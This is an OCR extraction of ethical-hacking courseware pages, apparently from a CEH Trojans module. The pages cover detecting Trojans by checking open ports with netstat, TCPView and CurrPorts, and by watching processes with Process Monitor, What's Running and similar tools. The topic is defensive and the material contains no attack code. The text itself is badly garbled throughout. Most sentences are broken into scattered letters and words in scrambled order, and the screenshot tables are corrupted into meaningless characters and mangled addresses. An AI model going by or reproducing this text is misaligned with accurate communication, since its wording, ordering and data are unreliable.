8.
S c a n
f o r
s u s p i c i o u s
N E T W O R K
9.
S c a n
f o r
s u s p i c i o u s
m o d i f i c a t i o n
s u c h
p r o d u c t
y o u r
f o ll o w i n g
y o u r
a r e
s y s t e m
t h e
a s
a
u s e f u l
c o m p u t e r ,
u n a u t h o r i z e d
h a s
o r
s t e p s
t o
b e
y o u
f o r
o r
t h e r e b y
a c c e s s
u s e d ,
c a n
l e g i t i m a t e
w h i c h
a ls o
d e t e c t i n g
file
a c c e s s i n g
a n d
t o
b u t
y o u r
p r o t e c t
a u t o m a t i c a l l y
d e t e c t
t h e
T r o ja n s
T r o ja n s :
P O R T S
D R IV E R S
in s ta lle d
o n
t h e
c o m p u t e r
SE R V IC E S
A C T IV IT IE S
t o
O P E R A T IN G
S Y S T E M
FILES
1 0 . R un T ro ja n S C A N N E R t o d e te c t T ro ja n s
M o d u le 0 6 P a g e 9 4 8
S
Trojans open unused ports in victim machine to connect back to Trojan handlers
B
Look for the connection established to unknown or suspicious IP addresses
S
C:\Wi ndows\syste m 32\ cmd exe
i
x
J : \U s e r s \ A d m i r O n e ts t a t -a n |
I c t i v e C o n n e c tio n s
P ro to
TCP
TCP
TCP
TCP
TCP
TCP
L o c a l A d d re s s
0 .0 .0 .0 :1 3 5
0 .0 .0 .0 :4 4 5
0 .0 .0 .0 :5 5 4
0 .0 .9 .0 : 1 0 2 5
0 . 0 . 0 .0 : 1 0 2 6
0 .0 .0 . 0 : 1 0 2 7
State
TCP
n n 0 a:109ft
I . IQT PNI NH
TCP
TCP
TCP
0 .0 .0 .0 : 1 0 2 9
0 .0 . 0 . 0 : 2 0 6 ?
0 .0 .0 .0 :5 3 5 7
LISTENING
LI STENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
TCP
0.0.a.0:10243
TCP
TCP
TCP
127.0.0.1:12080
1 2 7 .0 .0 .1 : 1 2 0 8 0
127.0.0.1:12000
TCP
TCP
TCP
LISTENING
LISIENING
LISTENING
LISTENING
0 .0 .0 .0 : 2 2 3 5 0
1 2 7 .0 .0 .1 : 1 2 0 2 5
LISTENING
ESTABLISHED
LISTENING
<
r S i 8 ‫־‬8 ‫ ' ־‬J : l SI J 8
r S i 8 ‫־‬8 ‫ ' ־‬I: TS888
( n r in c N
J S V 8 ‫־‬8 ‫ ־‬T: 2382S
I S . VH' N' I - 2 3 8 2 8
J S A * 8 8 ‫ ' ־‬I : IS08H
:
a
0
‫כ‬
>
riZlEMIHC
K ld B riZ H E D
E2IWBn 2HED
.‫_־‬.‫־‬fj
S c a n n i n g
System A d m in is tra to r
ES T AB L IS HE D
1 2 7 .0 .0 .1 : 1 2 1 1 0
f o r
■Copyrif;ht © by EG-Gouncil. All Rights Jteseivfed.;Reproduction is Strictly Prohibited.
S u s p ic io u s
P o r t s
□
T r o j a n s
h a n d l e r s .
T h e s e
p o r t s
lo o k
a n d
o p e n
T r o ja n s
f o r t h e
31
Proto
T CP
ICP
TCP
ICP
ICP
ICP
ICP
TC P
ICP
TC P
ICP
ICP
ICP
ICP
ICP
ICP
TC P
c a n
b e
p o r t s
o n
i d e n tif ie d
c o n n e c t i o n
t h e
b y
e s t a b l i s h e d
v i c tim 's
s c a n n i n g
t o
m a c h i n e
f o r
u n k n o w n
t o
c o n n e c t
s u s p i c i o u s
o r
p o r ts .
s u s p ic i o u s
b a c k
t o
S c a n
f o r
t h e
T r o ja n
s u s p ic i o u s
IP a d d r e s s e s .
C:\W indows\system32\cmd.exe
C : \ U s e r s \ A d n i n ' 11e t s t a t
A ct iu e
u n u s e d
-a n
Connect ions
L o c a l Address
0 .0 .0 .0 :1 3 5
0 .0 .0 .0 :4 4 5
0 .0 .0 .0 :5 5 4
0 .0 .0 .0 :1 0 2 5
0 .0 .0 .0 :1 0 2 6
0 .0 .0 .0 :1 0 2 ?
0 .0 .0 .0 :1 0 2 8
0 .0 .0 .0 :1 0 2 9
0 .0 .0 .0 :2 8 6 9
0 .0 .0 .0 :5 3 5 7
0 .0 .0 .0 :1 0 2 4 3
0 .0 .0 .0 :2 2 3 5 0
1 2 ? .0 .0.1:12 0 25
1 2 7 .0 .0.1:12 0 80
1 2 7 .0 .0.1:12 0 80
1 2 7 .0 .0.1:12 0 80
1 2 7 .0 .0 .1 :1 2 1 1 0
F o re ig n Address
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
0 .0 .0 .0 :0
1 2 7 .0 .0.1:53 8 50
1 2 7 .0 .0 .1 :5 3 8 5 2
0 .0 .0 .0 :0
State
L ISTEN ING
LISIEN ING
LISTEN ING
LISIEN IN G
LISTEN ING
LISIEN ING
LISIEN ING
LISIEN ING
LISIEN ING
LISIEN ING
LISIEN ING
LISTEN ING
LISIEN ING
LISTEN ING
E S T A B L IS H E D
E S T A B L IS H E D
L ISTEN ING
Type n e t s t a t —a n
in command prompt
System Administrator
FIGURE 6.48: Scanning for Suspicious Ports
M o d u le 0 6 P a g e 9 4 9
Port Monitoring Tools: TCPView
and CurrPorts
TCPView is a W indow s program that w ill show detailed listings
CurrPorts is n e tw o rk m o n ito rin g softw are that displays the
o f all TCP and U DP en d p o in ts on your system, including the
local and rem ote addresses and state o f TCP co nn e ctio n s
list o f all currently opened TCP/IP and U DP ports on your
local com puter
T H O
TCPView - Sysinternals: www.sysintemals.com
gr
Fie Options P i o c e s s V i e w Hdp
x a
t
€
0
m
772
772
772
772
772
772
773
773
773
C c**re»«
C
Rerwie
L o cd A d d esi
: ;> * » < » P fry :
c * « cre» 9
!e
>}X O
•3 *0
3576
‫ז ד ה ו‬.
1B 76
876‫נ‬
3876
3676
3 fc & 8
41^4‫מ־ל«ו‬1‫׳*ל‬
TCP
tc p
tc p
TCP
TCP
TCP
TCP
TCP
TC P
TC P
TC P
TC P
‫ז‬cp
TCP
R e m o t e P o rt S ta i*
N
N v
1 2 3 .1 7 5 3 2 1 4 7
1 2 3 .1 7 S 3 ? 1 4 7
1 2 3 .1 7 5 3 2 . 1 3 3
1 23 IT S 3 ? 1 ‫מ‬
1 2 3 .1 7 6 3 2 . 1 5 3
w>«
win fm‫»־‬W1.«M1
wn nv?‫»־‬W
1.4k41
wnm?«l(*.4k41
wnmv«lf*4k41
mmw:lcMk41
wnmw*>4k4l
ESTrtUSKD
aosc.w,»iT
r?T
*«j^rr»
r ‫־‬-‫*־‬n 1 ‫־‬.rrr>
‫ [ז‬%«T‫! «*ז‬#
.•I■!!1
M J r4 4 ( D
f«13‫סי‬
13953MISOMfrtCONNvt>
w
p13M
OInvlrp. Ntp
N?>
123.175 ]?.14/
m/wVl1111•rf«VI Ntp
miWl111ftrrfiVI
W
NM
M
rîm
WN
r.n
rK4K
K
M1tetk4k41
TC P
TC P
TC P
TC P
TC P
LISHMIM&
u n - f i s t * W ‫׳‬. < k 4 1
W N + t $ S E L C K 4 K ..
w in m s a W < . 4 k 4 1
W N M SSE LC K 4K
Illo^jj'.ICJ-frfj■) 1... Itto
4262
3026
3026
102$
v<hmewlcl.4k41
0
1‫ ״‬W J M S S E L C M K 0
-J S '
«
3
0
Procn...
Plotocol
Local Por
local Po*... Local Add‫ ׳‬m i
♦
♦
•
«
•
♦
♦
♦
864
1940
1940
900
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
TCP
TCP
TCP
TCP
TCP
500
1900
3702
ittkmp
:5dp
ws-disco...
wfdiico...
ws-diKO...
■ptecmtft
llmnr
Syjtcr•
SyTUm
Systen
Syd*m
Sy*fr‫״‬
Syiten
1375
BM
47•
1376
Systen
•
♦
•
0
®
♦
C
LlSIENIUi
LISTEMI3.‫־‬
USTEW\3
W I N M S S E lC M K . 0
% V V
i
Proem N*
• Systen
• Syilam
‫ז‬5S‫»ז‬
*^‫«זז‬
E
T«4M
jy4(D
tstan,4i
:1
[ S ie ttjy -tfD
IS'.‫■־‬BLJ11*
!‫־‬.‫־‬fllhMf
1051
h3»HB91«IOO tapi
r‫׳‬f.VI Ntpi
nuvfl3116-«W4Ip >Dp1
mWUll&•(><.! 1•... Ittpi
m« m1tefcK4k41
Mn»m1«‫־‬k*.4l41
mn-imnlcMMI
3668 ‫ י‬TC P
644 TC P
S44 TC PV6
516 TC P
11*11
v / i u M r . r .r 1( r a r . n
w lN M & S E L C M r. 0
lo c d h e tf
105?
UANMSSELCK4K
WNMSSELCMK
tc p
- !ml-Pt
CurrPorts
| F*e Ed* V!cw Option? Hdp
1040
1940
1940
900
0
0
Syitcm
Syaem
Unknown
Unknown
Unknown
Unknown
Unknown
0
0
0
3702
3702
45C0
5355
51225
59293
$9294
62058
62060
49244
4924S
80
ao
ao
80
80
http
http
http
http
Wtp
[1:1:5355
[::]:5122S
[l«d0!:b9M:d01.H
[::1JW94
10.00.12:49245
10.00.12:492*2
10.00.12*9253
49253
49254
Remote _ A
[::]:3702
[::]:3702
[::]:4)00
[::]:62056
[::1:62060
10.00.12:49244
492S2
Remote...
[::]:500
[C111900
[::1:3702
10.00.12*9254
<
E f l a b f e h e * 22
L is te n in g : 2 8
*
>
N ir S o tt P r o e v y a r e . m t t» v rw w .r u r * o tt n
5 3 T o ta l P o r ts , ‫ ו‬R & n o u C o n n e c t io n s , 1 S e le c te d
http://technet.microsoft.com
http://www. nirsoft. net
Copyright © by EG-CMMCil. All Rights ^pS'ervfed'.;Reproduction is Strictly Prohibited.
P o r t
M
o n i t o r i n g
T o o ls :
T C
P V i e w
a n d
C
u r r P o r t s
T C P V ie w
S o u r c e :
T C P V ie w
t h e
is
a
s y s t e m ,
W i n d o w s
p r o g r a m
in c lu d in g
W i n d o w s
N T ,
e n d p o i n t .
It
p r o g r a m
h t t p : / / t e c h n e t . m i c r o s o f t . c o m
t h e
2 0 0 0 ,
a n d
p r o v i d e s
a
t h a t
is
lo cal
XP,
m o r e
s h i p p e d
t h a t
a n d
s h o w s
r e m o t e
T C P V ie w
a ls o
i n f o r m a t i v e
w i t h
d e t a i l e d
W i n d o w s .
listin g s
a d d r e s s e s
r e p o r t s
a n d
It
a n d
t h e
o n
all
t h e
n a m e
c o n v e n i e n t l y
w o r k s
o f
T C P
a n d
s t a t e
o f
o f
t h e
T C P
e n d p o i n t s
c o n n e c t i o n s .
p r o c e s s
p r e s e n t e d
W i n d o w s
U D P
t h a t
s u b s e t
o f
N T / 2 0 0 0 / X P
a n d
O n
o w n s
t h e
o n
t h e
N e t s t a t
W i n d o w s
9 8 / M E .
W h e n
t o
T C P V i e w
t h e i r
p r o c e s s
c h a n g e
s h o w n
file
a s
it e n u m e r a t e s
n a m e
t h a t
o w n s
e a c h
s t a t e
f r o m
o n e
in
r e d ,
c o n n e c t i o n s
a
r u n s ,
d o m a i n
a n d
( t h o s e
n e w
v e r s i o n s .
e n d p o i n t .
u p d a t e
t o
w i t h
B y
a
a c ti v e
T C P
W i n d o w s
d e f a u l t,
t h e
e n d p o i n t s
l a b e l e d
all
O n
n e x t
a r e
s t a t e
a r e
s h o w n
o f
a n d
X P
U D P
T C P V ie w
is
g r e e n .
E S T A B L IS H E D )
T C P V ie w
u p d a t e d
h ig h li g h te d
in
e n d p o i n t s ,
s y s t e m s ,
in
r e s o l v in g
s h o w s
e v e r y
y e llo w ;
s e c o n d .
t h o s e
t h a t
T h e
u s e r
c a n
c lo s e
a n d
s a v e
T C P V ie w 's
all
t h e
IP a d d r e s s e s
n a m e
o f
E n d p o i n t s
a r e
t h a t
d e l e t e d
e s t a b l i s h e d
o u t p u t
t h e
a r e
T C P /IP
w i n d o w
t o
w e ll.
M o d u le 0 6 P a g e 9 5 0
\
JMft
File
L‫־‬J O x I
TCPView - Sysinternals: www.sysinternals.com
Options
Q
Process
View
Help
-< H
a
Process '
PID Piolocol
‫[ י‬System Proc... 0
TCP
fg chrome.exe
772 TCP
chrome.exe
772 TCP
fg chrome.exe
772 TCP
(• chrome.exe
772 TCP
(? chrome.exe
772 TCP
chrome.exe
772 TCP
chrome.exe
772 TCP
chrome.exe
772 TCP
chrome.exe
772 TCP
chrome.exe
772 TCP
 googletalk.exe 3688 TCP
L^^Booaletdk exe 3688 TCP
googletalk.exe 3688 TCP
a“ lsass.exe
644 TCP
I “ Isass exe
644 TCPV6
”
services.exe
636 TCP
■
‫ ־‬1— '-----------Endpoints: 69
Established: 22
Local Address
win‫־‬msseick4k41
win-msseick4k41
W1rvmsselck4k41
win-msseick4k41
W1n-msselck4k41
win‫־‬msselck4k41
win-msselck4k41
win-msseick4k41
win-msselck4k41
win-msseick4k41
W1n‫־‬msselck4k41
WIN-MSSELCK4K
WI N-MSSELCK4K..
WIN-MSSELCK4K
WI N-MSSELCK4K..
win-msselck4k41
win-msseick4k41
win-msselck4k41
win-msseick4k41
win-msselck4k41
win-m:; elck4k41
win-msselck4k41
WIN-MSSELCK4K
win-msselck4k41
WIN-MSSELCK4K
G
Local Port
4277
4164
4250
4251
4252
4274
4275
4276
4278
4279
4280
12121
12122
1051
1052
1082
4033
4266
4271
1195
4281
4282
1028
1028
1029
Remote Address
Remote Port
123.176.32.147
http
123.176.32.147
http
123.176.32.138
http
123.176.32.138
http
123.176.32.153
http
r-199-59-150-9. twt... http
vipl 3 Ib40 lond.co... http
vipl 3.Ib40. lond.co... http
123.176.32.147
http
maa03s16-in-f27.1... http
maa03s16-in-f27 1... http
WI N-MSSELCK4K... 0
WIN-MSSELCK4K... 0
localhost
1052
localhost
1051
hg-in-f189.1e100.... https
maa03s16-in-f22.1... https
maa03s16-in-f4.1e... https
maa03s16-in-f2.1e... https
ni-in-f125.1 e100. net 5222
74.125 236 189
http
maa03s16-in-f29.1, . http
WIN -MSSELCK4K... 0
win-msselck4k41
0
WIN -MSSELCK4K... 0
III
Listening: 28
Time Wait: 1
«‫׳‬N
State
TIME WAIT
ESTABLISHED
ESTABLISHED
ESTABLISHED
=
ESTABLISHED
CLOSE WAIT
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
LISTENING
LISTENING
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
SYN SENT
SYN SENT
LISTENING
LISTENING
LISTENING
V‫׳‬
]"<‫־‬
Close Wait: 1
I
FIGURE 6.49: TCPView Tool Screenshot
C u r r P o r t s
S o u r c e :
T o o l
h t t p : / / w w w . n i r s o f t . n e t
C u r r P o r t s
a ll o w s
y o u
t o
u s in g
p o r ts .
Y o u
c a n
a n d
t h e
e x p o r t
all
o r
o p e n e d
T C P /I P
p r o c e s s
t h a t
p r o c e s s ,
v e r s i o n
t h e
It
p r o c e s s
a ll o w s
s a v e
t h e
U D P
y o u
t o
T C P /U D P
a
p o r t
t o
o n
is
o f
a n d
a n
t h e
a ls o
t h e
t h e
u n w a n t e d
p o r t s
o f
p o r t s
s e l e c t e d
i t e m s
i n f o r m a t i o n
c lo s e
list
p o r t s
t h e
c r e a t e d ,
a
c lo s e
s e l e c t e d
a n d
o p e n e d
w a s
v i e w
t h a t
a r e
c o n n e c t i o n
H T M L
o r
s y s t e m .
d i s p l a y e d ,
p r o c e s s
( p r o d u c t
c r e a t e d
T C P
c o n n e c t i o n s ,
H T M L
r e p o r t .
e a c h
p o r t
HI*
Edit
Vimw Option!
It
in
t h e
n a m e ,
u s e
a n d
t e r m i n a t e
d is p la y s
t h e
list,
p r o c e s s
file
t h e
a p p li c a ti o n
t h e
t h e
p r o c e s s
list
o f
all
n a m e ,
d e s c r i p t i o n ,
full
e tc .),
u s in g
is
it,
c u r r e n t l y
a b o u t
p a t h
t h e
t h a t
o f
t h e
t h e
t i m e
t h a t
p o r ts ,
a n d
it.
kill
file, X M L
t h e
p r o c e s s
file,
t h a t
o p e n e d
o r t a b - d e l i m i t e d
1= 1-
CurrPorts
&
in
a ls o
in c lu d in g
w h o
t o
a n d
t e x t
F o r
u s e r
c u r r e n t l y
t e x t
t h e
file.
-‫| _ ט‬
H‫ ״‬iP
Proutt N«‫״‬
PlOC«..
Protocol
LocjI Port
lc«*i Pci.
loc4l Add'au
O System
O System
O System
0* System
O System
O System
O System
O System
O System
® System
O System
O System
0 Unknown
O Unknown
O Unknown
® Unknown
Unknown
864
1940
1940
90‫כ‬
1376
864
476
1375
1940
1940
1940
9W
0
0
0
‫ס‬
0
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
TCP
TCP
TCP
TCP
TCP
500
190‫כ‬
3702
3702
3702
450:
5355
51225
59293
5929a
62056
6205C
4924a
49245
49252
sakmp
‫ ״‬dp
W5*SCO_
as-Jsco
WS-*KO_
ipsec-m^t
Imnr
[::1500
[::190:[ ‫ ו‬c
[::>3702
[::>3702
[::>3702
[::>4500
[::>5355
[::>53225
[fe80=b9ea:d01]::‫<ד‬59294
[::(62056
[::>62060
1000.1249244
80
1000.1249245
60
1000 1249252
SO
1000.1249253
60
1000124925a
SO
49253
4925a
1
53 Total Port* I Remote Connections, Selected
_
Ram
NxV.fl r>p.—
R«mot•,.. A
http
http
http
http
http
v 1
hMp-/'www.ni» »till.‫ווו‬
FIGURE 6.50: CurrPorts Tool Screenshot
M o d u le 0 6 P a g e 9 5 1
Scanning for Suspicious
Processes
CEH
Trojans camouflage themselves as genuine
W in d o w s services o r hide th e ir processes to
th a t show s file system , registry, and p ro ce ss/th re a d
avoid detection
a c tiv ity
Process M o n ito r is a m o n ito rin g to o l fo r W in d o w s
Some Trojans use PEs (Portable Executable)
to in je ct into various processes (such as
explorer.exe o r web browsers)
UHU
Process Monitor - Sysinternals: www.sysinternals.com
Processes are visible but looks like a
legitim ate processes and also helps bypass
desktop fire w a lls
£ile
Edit
Event
Filter
L* Ll
Troe
Pocess Name
11:09:
Explorer EXE
‫ ו‬1:09:.. Explow EXE ^
Explorer EXE^
Explorer EXE* ^
‫וו‬:‫מ‬:..
‫ו‬1:09:..
‫ ®וו‬:‫״‬
Trojans can also use ro o tk it m ethods to hide
th e ir processes
jbcpkxwtXE^
‫ ®וו‬... j EwIofw.EXE*
‫ ®וו‬:.. • ctrx* tx ■
‫ור‬:09:..
‫וד‬:09:..
‫וד‬:09:..
‫ ®וו‬..
‫״®וו‬.
Use process m o n ito rin g tools to detect
hidden Trojans and backdoors
Tools
&
cans .exe ^
■‫!־‬cans.ece
csns « e ■
csrss exe ” 1
fiptions
V i©
Help
I I
£ | a | ,,. l * !
3ID Operation
Path
Resit
5572 ^CreateFileMa... C:\Prcgram Hes * 86)\Nbz1ll8 hnefo SUCCESS
5572 rftRogOponKoy HKLM\Scftwaro\MIo‫׳‬oooft\V/r‫ »״‬w SUCCESS'
5572
RegGHjeiyValueHKLMvSOFTWAREWaoMftXMftn.. NAME NO‫־‬
5572 StRegOcseKey HKLM\S0 FTWARE\M1cro5oft\Wr».. SUCCESS
72‫ צ<׳‬KcreateFile
C:\Progrwn Hes x»6>\Nbz1lla hato NAMr NO
5572 ^ Q u w y BasicInf.. .CAPregrani Hes xDG)\Mjulla Hrefo .. SUCCESS
548 & R # *d F I#
C:\Window«\Syct*m32\cxee‫־‬v dl
SUCCESS
548 ‫־‬A Read Fie
C:\Windows\System32\csrKv dl
SUCCESS
548RegQueryValusHKLM\S0 FTWARE\M1aoscft\Win.. SUCCESS
548
Read Fie
C:\Windows\Systefn32\sxs.dll
SUCCESS
548 & Read Pie
C:\W1ndows\System32\sxs.dll
SUCCESS
>48 rftRwQucrvKcv HKLM
SXCESS
Showing 3S9,3T5 cf 662,305 events (54%)
Backed by virtual memory
S c a n n i n g
T h e r e
s y s t e m
a ls o
a r e
s u d d e n l y
c o m e s
v a r i o u s
b e c o m e s
d o w n
u s e
c e r t a i n
n o r m a l l y
d e t e c t e d
t h r o u g h
S u s p i c i o u s
s y m p t o m s
s lo w ,
c a n
i n d ic a te
d o w n l o a d i n g
r o o t k i t
b y
m e t h o d s
a n ti v i r u s
p ic tu r e s ,
b e
m u s i c
g o o d
t o
s p e e d
m a k e
s o f t w a r e .
files,
e v e r y t h i n g
s e e m s
t o
m o n i t o r i n g
to o ls ,
w e
c a n
a n d
k in d s
o f
v u l n e r a b il i ti e s
o t h e r
t h a t
P r o c e s s e s
t h a t
o u r
b e c o m e s
s y s t e m
s lo w ,
h a s
a n d
b e e n
t h e
i n f e c t e d .
I n t e r n e t 's
T h e
s p e e d
d ra s tic a lly .
A t t a c k e r s
s y s t e m
f o r
b u t
e a s ily
T h e s e
v i d e o s ,
s lo w ly
d e t e c t
e tc .
t h e y
h i d d e n
o r
t h e
T r o ja n
in
a n d
w o r m s
T r o j a n s
t h a t
s h o w
a r e
c a n
in
s y s t e m
a n d
d e t e c t e d
w h e r e
u s u a lly
in to
v a r i o u s
w o r m s ,
b e
t h e
d o w n l o a d e d
e f f e c t
T r o j a n s ,
v i r u s e s
h i d e
t h e
w a y s .
e n t e r
in to
s y s t e m .
B y
b a c k d o o r s .
b y
it c a n ' t
s c a n n i n g
t h e
Initially,
u s in g
p r o c e s s
H i d d e n
f o r
b e
T r o ja n s
s u s p ic i o u s
p r o c e s s e s .
P r o c e s s
S o u r c e :
P r o c e s s
a n d
M o n i t o r
Its
M o d u le 0 6 P a g e 9 5 2
o n it o r
is
p r o c e s s / t h r e a d
p r o g r a m s .
M
a
m o n i t o r i n g
to o l
a c tiv ity .
is
f e a t u r e s
It
in c l u d e
f o r
u s e d
rich
W i n d o w s
t o
a n d
t h a t
a n a l y z e
t h e
s h o w s
r e a l - t i m e
b e h a v i o r
n o n - d e s t r u c t i v e
o f
f ilte r in g ,
file
s y s t e m ,
s p y w a r e
R e g is try ,
a n d
c o m p r e h e n s i v e
d u b i o u s
e v e n t
p r o p e r t i e s
w i t h
s u c h
i n t e g r a t e d
a s
s e s s i o n
s y m b o l
P r o c e s s
File
Time
11:09
<
Edit
ID s
a n d
s u p p o r t
f o r
M o n i t o r
Event
Fijter
Process Name
(Explorer.EXE
_‫־‬, Explorer.EXE
^(Explorer.EXE
,Explorer.EXE
, Explorer.EXE
1Explorer.EXE
■'csrss.exe
■'csrss.exe
■'csrss.exe
■'csrss.exe
■'csrss.exe
■' csrss.exe
u s e r
n a m e s ,
r e lia b le
e a c h
o p e r a t i o n ,
p r o c e s s
s i m u l t a n e o u s
i n f o r m a t i o n ,
lo g g in g
t o
a
full
file,
t h r e a d
s ta c k s
e tc .
‫ ־‬S y s in te rn a ls : w w w .s y s in te r n a ls .c o m
Tools
PID
5572
5572
5572
5672
5572
5572
548
548
548
548
548
548
Options
Help
Operation
Path
Result
ykCreateFileMa... C:\Program Files fc86)\M0zilla Firefo... SUCCESS
^tRegOpenKey HKLM\Software\Microsoft\Window... SUCCESS
4%RegQueryValueHKLM\S0FTWARE\Microsoft\Win... NAME NO‫־‬
^ R egQ oseKey HKLM\SOFP 1VARE\Microsoft\Win... SUCCESS
[^Create File
C:\Program Files fx86)\M0z1lla Firefo... NAME NO‫־‬
ykQuefyBasiclnf...C:\Program Files fc86)\M0zilla Firefo... SUCCESS
2^ Read File
C:\WrKJcws\Systern32\sxssfV.dll
SUCCESS
^ Read File
C:\Windows\System32\csrsrv.dll
SUCCESS
& RegQueryValue HKLMXSO FTWAR E\Microsoft\Win... SUCCESS
Read File
C:\Windows\System 32\sxs dll
SUCCESS
Read File
C:\Windows\System32\sxs.dll
SUCCESS
rftReaQuervKev HKLM ____________
SUCCESS
III
Showing 359,375 of 652,305 events (54%)
>
Backed by virtual memory
FIGURE 6.51: P ro c e s s M o n ito r
M o d u le 0 6 P a g e 9 5 3
E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s C o p y r i g h t © b y E C - C 0 l1 n C il
Process Monitoring Tool: What's
Running
J
What's Running gives an inside look into your W indow s operating systems
CEH
M ic ro s o ft
e Inspect the processes and
get performance and
resource usage data such
as memory usage,
processor usage, and
handles
e Information about dlls
loaded, services running
within the process, and IPconnections associated
with processes
Copyright 6 by EG-GtUIICil. All Rights Reserved. Reproduction is Strictly Prohibited
P r o c e s s
^
S o u r c e :
W h a t ' s
M
o n i t o r i n g
R u n n i n g
9
e tc .
g iv e s
t h r o u g h
P r o c e s s e s :
s u c h
a s
t h a t
a r e
e a c h
W
h a t ’ s
R
u n n i n g
h t t p : / / w w w . w h a t s r u n n i n g . n e t
y o u
a n
2 0 0 0 / X P / 2 0 0 3 / V i s t a / W i n d o w s 7 .
d r iv e r s ,
T o o l:
It
a
It
s i m p l e - t o - u s e
i n s p e c t s
m e m o r y
t h e
u s a g e ,
l o a d e d ,
p r o c e s s
in s id e
e x p l o r e s
in to
y o u r
p r o c e s s e s ,
W i n d o w s
s e r v ic e s ,
s y s t e m ,
m o d u l e s ,
s u c h
a s
I P - c o n n e c ti o n s ,
a p p li c a ti o n .
p r o c e s s e s
p r o c e s s o r
s e r v i c e s
lo o k
t h a t
a n d
u s a g e ,
a r e
g iv e s
a n d
r u n n i n g
p e r f o r m a n c e
h a n d l e s .
w i t h in
t h e
a n d
It g i v e s
p r o c e s s ,
all
r e s o u r c e
t h e
a n d
u s a g e
d e ta i ls
t h e
a b o u t
d a t a
d l l :s
I P - c o n n e c t i o n s
h a s
9
IP c o n n e c t i o n s :
9
S e r v ic e s :
9
M o d u l e s :
It g i v e s
I n s p e c t s
F in d s
t h e
o u t
all t h e
s e r v i c e s
t h e
a c tiv e
t h a t
IP c o n n e c t i o n s
a r e
r u n n i n g
a b o u t
all
a n d
dll:s
in y o u r
s y s t e m
s t o p p e d
a n d
e x e :s
t h a t
a r e
in
u s e
o n
y o u r
s y s t e m
M o d u le 0 6 P a g e 9 5 4
D r iv e r s :
t h e
It f i n d s
file v e r s i o n
S y s t e m
in s ta lle d
o u t
t h e
f o r f in d in g
i n f o r m a t i o n :
m e m o r y ,
It
t h e
s u p p l i e r
s h o w s
p r o c e s s o r ,
a b o u t
all d r i v e r s ,
o f t h e
c ru c ia l
r e g i s t e r e d
f o r
r u n n i n g
d r iv e r s
View
Startup
i n s p e c t
s y s t e m
u s e r ,
a n d
o p e r a t i n g
a b o u t
s y s t e m
y o u r
s y s t e m
a n d
s u c h
a s
its v e r s i o n
—
|□
Help
Processes 79‫| ־‬
Snapshot
Q $ ‫־‬ake snapshot
t j Load Snapshot from file
Compare snap with sa...
© Upload Snapshot to ...
_
c a n
d r iv e
W h at’s Running? 3.0
File
y o u
Processes
X
Start Process
o
Stop process
3
Select Process columns
View delta Icons
Get nfo onlne
t f Open folder
, J - ihow processes in Tree
A
rs -
Services■1701 Gl Mo d i e s 3 4 9 ‫^ |־‬
Process Name
Proces. User Name
lsass.exe
616 SYSTEM
w1nlogon.exe
564 SYSTEM
dwm.exe
868
J explorer.exe
600 Administrator
igfxtray.exe
3908 Administrator
hkcmd.exe
3936 Administrator
igfxpers exe
4028 Admintstrator
!{ft edpr_server.exe
3140 Administrator
2224 Administrator
Q WinFLTray.exe
M FLComServDrl.exe
1036 Administrator
J Snagit32exe
1396 Administrator
TscHelp.exe
3268 Admmstrator
SnagPriv.exe
3532 Administrator
C- 1^1 SnagitEdrtor exe
4120 Administrator
4324 Admmstrator
splwow64.e.
U firefox exe
4420 Admmstrator
4304 Admmstrator
3 P0WERPNT.EXE
4200 Administrator
S mmc.exe
vmconnect.exe
3372 Admristrator
3304 Administrator
googletalk exe
!rt| EMET_notifier exe
3404 Admintstrator
© chrome exe
4708 Administrator
‫ ! ■ ^ ^ י י י י זרד ־ ׳ל^^א יקת‬w•:. ‫ ;־‬1 ■■:‫״‬-‫•־״־־‬:-,:i
4872 Admintstrator
chrome.exe
( 0 chrome.exe
2700 Admmstrator
^ chrome.exe
5096 Admmstrator
^ chrome.exe
3600 Admmstrator
(£) chrome.exe
2580 Admmstrator
{£) chrome.exe
2240 Admmstrator
IPConnections ■37 | ** Drivers• 279 | Q ‫ ״׳‬Startup-16 |
CPU Prod!
0.0 KA
0.0 ►
tf
►
0.0 ►
0.0 I
00 I
00 I
00 E
00 F
00 F
c
*
00
c
*
00 c
00 ►
F
*
00 ►
00 ►
00 ►
00 C
00 E
00 C
m n =
*
C
00 c
0.0 c
tf
c
0.0 c
0.0 o
Item
3
Process Properties
Process ID
Process Name
Parent Process ID
CPU
Target
® Process
0 Memory
Page Fault Count
Peak Working Set,.
Working Set Size
Quota Peak Page...
Quota Paged Pool...
Quota Peak Non‫־‬.‫״‬
Quota Non-Paged...
Page FJe Usage
Peak Page File Us...
® File Version
0 Time
Creation Time
Kernel Time
User Time
System Info |
4856
chrome.exe
4708
0.0
Win32
58907
45948 K
37900 K
232 K
225 K
25 K
25 K
32364 K
37436 K
10/2/2012 5:4203 PM
00:00:00:390
00:00:03:853
@ I/O
(3 Ul Objects
,1^ Services (0)
B [T Modules (46)
Update interval:! seconds
FIGURE 6.52: What's Running Tool Screenshot
M o d u le 0 6 P a g e 9 5 5
E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s C o p y r i g h t © b y E C ‫־‬C 0 U n C i l
P
r
o
p i
c
e
s
s
M
o
n
i
t
o
r
i
n
g
T
£•9
PrcView
‫־‬
M
%
l
s
C
E
H
http://www.neuber.com
Yet Another (remote) Process
M onitor
C
W insonar
http://www.fewbyte.com
http://yaprocmon.sourceforge.net
4)
bF3
o
Security Task Manager
http://www.teamcti.com
‫^י‬
o
HiddenFinder
MONIT
http://www.wenpoint. com
http://mmonit.com
Autoruns for W indows
Process M onitor
http://technet.microsoft. com
KillProcess
OpManager
http://orangelampsoftware.com
http://www.manageengine.com
P r o c e s s
T h e r e
in s ta lle d
y o u r
o n
a r e
